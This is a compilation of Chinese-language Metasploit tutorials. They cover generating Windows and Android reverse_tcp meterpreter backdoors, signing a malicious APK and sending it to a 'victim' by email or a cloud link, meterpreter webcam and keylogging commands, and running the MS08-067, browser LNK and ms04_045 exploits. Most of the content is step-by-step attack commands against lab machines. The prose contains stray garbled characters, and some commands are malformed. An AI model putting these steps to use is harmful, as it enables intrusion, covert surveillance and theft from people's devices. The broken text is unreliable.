❶ 如何利用metasploit進行漏洞掃描和攻擊
很多朋友對使用Metasploit利用後門程序進行滲透windows7都比較感興趣,針對這些以下業內相關專家就給大家介紹下,當下黑客怎麼利用Metasploit進行滲透windows7的。設定目標主機為:cn_win7_x86_7601虛擬機,地址為:192.168.0.116;而本地主機就為:192.168.0.149。方法步驟一:黑客用Msfpayload直接生成相關的後門程序,如下圖。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步驟二:黑客直接就能進入所在的目錄並將屬性進行修改,換為允許以程序執行文件,詳細如下圖。進入所在目錄,修改屬性:選擇「允許以程序執行文件」,這時候也可以做一些免殺方法步驟三:接著黑客就打開msfconsole並載入exploit/multi/handler模塊並進行設置本地主機,灶旅最後就能開始進行監聽了,詳細情況如下圖。打開msfconsole,載入exploit/multi/handler模塊,設置本地主機;然後開始監聽:exploit-z-j:方法步驟四:黑客需要能將程序直接拷貝都目標主機中並進行執行。方法步備辯空驟五:以上步驟全部完成後黑客就能通過後門程序反向連接到msf,用msf就能發起第2次的攻擊然後使用仿瞎客戶端也就是後門程序就能連接都服務端msf,詳細的如下圖。Meterpreter就是metasploit框架中的一個擴展模塊,因此的話溢出成功後黑客就能攻擊載荷進行使用,一旦攻擊載荷在溢出攻擊成功後就能再返回一個控制通道,這樣就能將它作為攻擊載荷成功獲得目標系統的一個meterpretershell的鏈接。另外,附meterpreter常用命令:getsystem#會自動利用各種各樣的系統漏洞來進行許可權提升migrate#進程id進程遷移background#把當前的會話設置為背景,需要的時候在啟用getuid#查看對方正在運行的用戶ps#列出所有的進程getpid#返回運行meterpreter的id號sysinfo#產看系統信息和體系結構shell#切換到cmd的系統許可權方式exit#退出shell會話返回meterpreter或終止meterpretergetdesktop截取目標主機當前桌面會話窗口runwebcam-p/var/www#在/var/www目錄監控目標主機的攝像頭keylog_recorder#使用migrate將會話遷移至explorer.exe的進程空間後記錄鍵盤
❷ 如何使用Metasploit對安卓手機進行控制
創建負載
我們需要兩台虛擬機:Kali Linux和安卓模擬器。
打開vm啟動Kali linux。接著打開終端,使用msfvenom製作android利用程序。
Msfvenom是msfpayload和msfencode的組合。它是一個單一的工具。它有標準的命令行選項。 Msfvenom用來製造的有效載荷用來滲透Android模擬器。
一如御凳旦打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 設置要使用的payload
LHOST 設置用來接收反彈連接的主機
LPORT 設置用來接收反彈連接的埠
R 設置文件格式
Location 要保存的文件位置
這個命令執行完之後,你會看到一些錯誤,但不用擔心。現在可以到輸出目錄查看生成的apk了。
我們已經成功創建了Android格式(APK)文件的有效載荷。現在一般Android的移動設備不允許安裝沒有適當簽名證書的應用程序。 Android設備只安裝帶有簽署文件的APK。
我們可以使用如下工具進行手動簽名:
l Keytool (已安裝)
l jar signer (已安裝)
l zipalign (需要安裝)
執行下列命令簽名。首先使用密鑰工具創建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然後使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali沒有預裝Zipalign,需要先apt-get install zipalign。然後用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
現在我們有了一個帶有簽名的APK,它可以安裝在任何設備上。
使用Metasploit進行測試
接下來啟動metasploit的監聽器。執行msfconsole打開控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是時候將惡意的APK發送到手機上。我們這里使用一渣旅個網盤上傳我們的APK,並將下載鏈拆攜接分享出去。
這是我們切換到安卓模擬器。
1、從https://code.google.com/archive/p/android-x86/downloads下載android x86的iso。
2、使用vmware創建一個內核版本為2.6的虛擬機。
3、掛載鏡像,啟動虛擬機。
4、進入Live模式。
5、設置手機並登陸谷歌帳號。
在安卓模擬器裡面點擊那個鏈接並下載。我們已經發送了一封郵件到受害者的谷歌帳號上。
另外要允許安卓安裝來歷不明的apk。
切換回Kali,我們發現創建了一個新的會話。
然後你就可以為所欲為的操作這台「手機」了。
❸ ms08-067 復現,使用metasploit
時間:2022-03-10
一、環境准備
1、需要臘歲轎輪肆准備英文的windows xp 環境。
鏈接: https://pan..com/s/1iN6hxbAlRHCaxPXaBiB4_g
2、攻擊工具使用的是metasploit,kali 自帶。
二、雀好復現時存在的問題
1、安裝完xp之後,我自己已經復現了一次,發現拿到的system沒有相關命令,可能是這個新系統沒有添加到環境中,之後建立了一個文檔進行讀取,也可直觀的看到結果。其他就沒遇到什麼問題了。
三、復現演示
1、虛擬機准備一下xp,建立一個test的文檔,查看一下靶機 IP,靶機建立完成
2、使用metasploit 進行攻擊
1)、msfconsole #進入metasploit
2)、search ms08-067 #搜索相關exp
3)、use exploit/windows/smb/ms08_067_netapi #使用這個exp
4)、show payloads #搜索相關payload,能讓攻擊後建立連接
5)、set payload generic/shell_bind_tcp #我使用的是這個
6)、set RHOST 192.168.154.144 #設置靶機IP,讓它攻擊這個IP,埠默認是445,這個就不需要設置了
7)、show options #可以用這個命令查看是否把相關配置設置全了
8)、run 或 exploit #進行攻擊,兩個命令都可以
9)、type test.txt #之後攻擊成功了,使用windows命令 就可以去相關路徑下查看那個 test 文檔了
演示圖:
❹ 怎樣使用metasploit檢測網站
您好,非常高興為您解答:
使用metasploit檢測網站
1.打開metasploit並輸入命令show exploits會顯示出目前可以使用的exploits;
2.從顯示出來的漏洞中找關於windows/browser開頭的信息,找到lnk漏洞名稱
3.輸入命令use exploit名稱,使用該漏洞,並輸入show options查看詳細信息;可以看到默 認設置無需在配置
4.使用show payloads查看該漏洞可以使用的padyload,會顯示出很多可用的payloads
5.使用set PAYLOAD payload 來設置該測試使用的payload,我們使用的運世清payload如圖所示並設置目標IP為 192.168.1.175,該IP為目標機的IP地址。
6.然後使用exploit來生成漏洞利用程序,
7.將http://192.168.1.177:80/復制並在目標機種打開ie並輸入該返襲url,即可完成旁前測試。在metasploit端會顯示如下信息,
8.然後該滲透測試已經成功,只需進入該測試產生的sessions即可獲得目標機的shell,
本次滲透測試就算成功了並成功獲取目標系統的shell,但這個測試的目標機是虛擬機,沒有任何主防及殺毒軟體。如果打過補丁或者有殺軟是很難成功的!
希望可以幫助到您!
❺ 如何安裝metasploit
一、搭建metasploit環境
Windows環境下安裝
metasploit
安裝時需要注意要關閉殺毒軟體,如果安裝有殺毒軟體,會提示在metasploit的安裝目錄下檢測到病毒或木馬。
二、metasploit的使用
Metasploit目前提供了三種用磨山戶使用介面,一個是GUI模式,另一個是console模式,第三種是CLI(命令行)模式。原來還提供一種WEB模式,目前已經不再支持。目前這三種模式各有優缺點,建議在MSF console模式中使用。在console中幾顫游李乎可以使用MSF所提供的所有功能,還可以在console中執行一些其它的外部命令,如ping。
Windows下GUI啟動方式,從開始菜單——Metasploit Framework——Metaspliit GUI即可。如下圖所示茄遲:
其GUI模式啟動後界面如圖2所示:
Windows下console模式的啟動方式與GUI方式類似,啟動後界面如圖3所示:
Metasploit的使用較為簡單,了解其基本命令即可。下面以console的使用方式為例說明如何使用:
輸入help或?可查看幫助信息。
下面以exploit中的ms04_045_wins為例進行說明。
1、show exploits,
2、info exploit/windows/wins/ms04_045_wins,查看其描述信息。
3、use exploit/windows/wins/ms04_045_wins,使用此exploit。
4、show options,查看相應的選項
5、set RHOST 192.168.1.200,設置目標
6、set RPORT 7777,設置埠
7、set PAYLOAD generic/shell_bind_tcp,設置使用的shellcode
8、exploit,執行攻擊